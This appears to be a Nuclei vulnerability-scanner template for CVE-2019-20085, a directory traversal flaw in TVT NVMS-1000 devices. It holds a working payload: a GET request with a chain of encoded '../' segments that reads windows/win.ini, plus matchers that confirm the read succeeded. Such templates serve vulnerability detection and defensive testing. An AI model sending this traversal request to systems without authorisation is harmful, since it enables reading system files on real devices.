27 lines
651 B
YAML
Executable File
27 lines
651 B
YAML
Executable File
id: CVE-2019-20085
|
|
|
|
info:
|
|
name: TVT NVMS 1000 - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
|
|
- https://www.exploit-db.com/exploits/48311
|
|
tags: cve,cve2019,iot,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "\\[(font|extension|file)s\\]"
|
|
part: body
|
|
- type: status
|
|
status:
|
|
- 200
|